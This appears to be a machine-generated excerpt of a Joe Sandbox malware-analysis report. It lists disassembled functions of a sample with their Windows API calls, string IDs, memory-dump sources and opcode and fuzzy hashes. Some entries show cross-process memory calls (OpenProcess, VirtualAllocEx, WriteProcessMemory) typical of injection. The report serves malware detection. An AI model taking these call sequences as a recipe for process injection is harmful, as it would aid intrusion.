                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                              • String ID: CALLARGARRAY$bnu
                                                                                                                                                                                                                                                                              • API String ID: 157775604-129101640
                                                                                                                                                                                                                                                                              • Opcode ID: 2326e0abf60414935c4a050868b4fd438ab82ddcfc291c2f9007ac8ef33adbd3
                                                                                                                                                                                                                                                                              • Instruction ID: 5c1993b79525d67d94ad3a69ebe344d45a0d7ae5b5009af7a4e87e24d64834be
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2326e0abf60414935c4a050868b4fd438ab82ddcfc291c2f9007ac8ef33adbd3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5441C271A00609DFCF04DFA8C8859FEBBB5FF58364F108169E509A7296E7789D81CB90
                                                                                                                                                                                                                                                                              Function 00753063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00752B1D,?,?,00000034,00000800,?,00000034), ref: 0075BDF4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007530AD
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00752B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0075BDBF
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0075BD1C
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00752AE1,00000034,?,?,00001004,00000000,00000000), ref: 0075BD2C
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00752AE1,00000034,?,?,00001004,00000000,00000000), ref: 0075BD42
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0075311A
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00753167
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                              • Opcode ID: 56dc814c888e1fc63d07f04ab9d5b71e705a089cca989d3894612d29a18ce530
                                                                                                                                                                                                                                                                              • Instruction ID: 2d716cf39ec73bd7c2916431d2297d1f67850b960063d64f324f6c5f5b37160c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56dc814c888e1fc63d07f04ab9d5b71e705a089cca989d3894612d29a18ce530
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A413D72A0021CBFDB10DBA4CD85AEEB7B8EF45341F104095FA55B7190DAB46F49CBA0
                                                                                                                                                                                                                                                                              Function 0075CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0075CBB1
                                                                                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 0075CBF7
                                                                                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007C29C0,00D00380), ref: 0075CC40
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                              • Opcode ID: a499f750a2c1212a8861a6be85760b20a6000b0f0c00823e84afd4887e363fbd
                                                                                                                                                                                                                                                                              • Instruction ID: 222f5bf34c869f594e15ff7acac206d73796bef22d3e642de24bf8a4bd5594e3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a499f750a2c1212a8861a6be85760b20a6000b0f0c00823e84afd4887e363fbd
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F410571204341DFD721DF28C884B9AB7E8EF84721F144A1DF9A9972D1C7B8E948CB62
                                                                                                                                                                                                                                                                              Function 00784EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0078DCD0,00000000,?,?,?,?), ref: 00784F48
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32 ref: 00784F65
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00784F75
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                              • Opcode ID: 228dacc93978b0dd02671b5cfde766e684e6b5028b569269acfb1c6c623d6ac6
                                                                                                                                                                                                                                                                              • Instruction ID: 80bef0819083792b64c30613fe6904a2d4ad43124683f5168edee90e8d081024
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 228dacc93978b0dd02671b5cfde766e684e6b5028b569269acfb1c6c623d6ac6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3631B07124020AAFDB20AF38CC45BEA77A9EF08374F244719FA75D21E0D7B8AC509B54
                                                                                                                                                                                                                                                                              Function 00784954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007849DC
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007849F0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00784A14
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                              • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                              • Opcode ID: ab1fa16eae1faaa33608cf20be2713d977cc2e006035f6e4eec94587dc80f96c
                                                                                                                                                                                                                                                                              • Instruction ID: f143d40aa6dea7fff53f158ad82ede9fb2b9a64a60dbce8a1724e0d7ea7cf051
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab1fa16eae1faaa33608cf20be2713d977cc2e006035f6e4eec94587dc80f96c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6521BF32640219BBDF259F50CC46FEB3BA9EF48724F114214FA156B0D0D6B9AC519B90
                                                                                                                                                                                                                                                                              Function 007850F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007851A3
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007851B1
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007851B8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                              • Opcode ID: 8043bfbf14b934058c217731843a1689aefa9b7c357756d32329c84aa548997c
                                                                                                                                                                                                                                                                              • Instruction ID: 9ed1bb3694bcd6ab5e72d1fda53a844f4fbcfdca243a9424aec94af0f234281d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8043bfbf14b934058c217731843a1689aefa9b7c357756d32329c84aa548997c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 572174B5640609AFDB10DF14CC85DB737ADEF593A4B144159F900973A1CB78EC15CB61
                                                                                                                                                                                                                                                                              Function 00784253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007842DC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007842EC
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00784312
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                              • Opcode ID: 76ca00cfcf14b9343787a6171e777fdc1ecb7a0a1b5ebebdf73c61f9310f36ef
                                                                                                                                                                                                                                                                              • Instruction ID: 63195b845fd116176b2129ceae869fa473b05e2817e5d37baac7d45a5d482cd4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76ca00cfcf14b9343787a6171e777fdc1ecb7a0a1b5ebebdf73c61f9310f36ef
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56219532654119BBEF119F94CC85FBB3B6EEF89764F118114F9009B190C6B99C528790
                                                                                                                                                                                                                                                                              Function 00765439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0076544D
                                                                                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007654A1
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,0078DCD0), ref: 00765515
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                                                                                                                              • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                              • Opcode ID: 3000b945b6cea3bce09859e0d29b78abbd92360bed4f4acecdc4e638bfb5c4f0
                                                                                                                                                                                                                                                                              • Instruction ID: 9aeb798e0e358764cd3d8572823c01634f85f464d678393551c537e713198da1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3000b945b6cea3bce09859e0d29b78abbd92360bed4f4acecdc4e638bfb5c4f0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A316571A00109EFDB10DF54C885EAA7BF9EF05304F148099F909DB262DB75EE45DB61
                                                                                                                                                                                                                                                                              Function 00788305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 00788339
                                                                                                                                                                                                                                                                              • EnumChildWindows.USER32(?,0078802F,00000000), ref: 007883B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                              • String ID: (|$(|
                                                                                                                                                                                                                                                                              • API String ID: 3814560230-2718393683
                                                                                                                                                                                                                                                                              • Opcode ID: dc121fd316a819d3dbf7d86b4124120e85b04b4f1430da90ffe28707ff5caf4e
                                                                                                                                                                                                                                                                              • Instruction ID: 6328da9dda0ba690493126387b327c4662d6fc2bf0121f831d4036a914aa17a9
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc121fd316a819d3dbf7d86b4124120e85b04b4f1430da90ffe28707ff5caf4e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65216674240205DFC760AF28D840AAAB7E1FB49720F60461DE869973A1DB78B801CB65
                                                                                                                                                                                                                                                                              Function 00784C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00784CED
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00784D02
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00784D0F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                              • Opcode ID: e9fdf1c4d6963e04992ee976d9571bfce045a0c7c4da6262f1fd5e70a52c2e86
                                                                                                                                                                                                                                                                              • Instruction ID: b79158237e554c38dd90bcfc472bb5e0814ba9ecd57075b15c6cfbde8b87f19b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9fdf1c4d6963e04992ee976d9571bfce045a0c7c4da6262f1fd5e70a52c2e86
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB110671380249BEEF206F65CC06FAB3BADEF85B64F110518FA51E20A0D6B5DC51DB24
                                                                                                                                                                                                                                                                              Function 0075389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00753712
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00753723
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: GetCurrentThreadId.KERNEL32 ref: 0075372A
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00753731
                                                                                                                                                                                                                                                                              • GetFocus.USER32 ref: 007538C4
                                                                                                                                                                                                                                                                                • Part of subcall function 0075373B: GetParent.USER32(00000000), ref: 00753746
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0075390F
                                                                                                                                                                                                                                                                              • EnumChildWindows.USER32(?,00753987), ref: 00753937
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                              • String ID: %s%d
                                                                                                                                                                                                                                                                              • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                              • Opcode ID: 892f5124ade4291f535ade6321c06d01404b936a4ddd2a8dfe70c7557b9fa562
                                                                                                                                                                                                                                                                              • Instruction ID: ca7b4c41140b1b82dc17aa2792e90da8fa9fd51296324f52fe3970e950fc548d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 892f5124ade4291f535ade6321c06d01404b936a4ddd2a8dfe70c7557b9fa562
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F011A8B1700209ABCF517F749C89AED776A9F94345F048069FD099B2A6DFB859098B30
                                                                                                                                                                                                                                                                              Function 006F59FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 006F5A34
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,006F37B8,?,?,?,?,?,006F3709,?,?), ref: 006F5A91
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
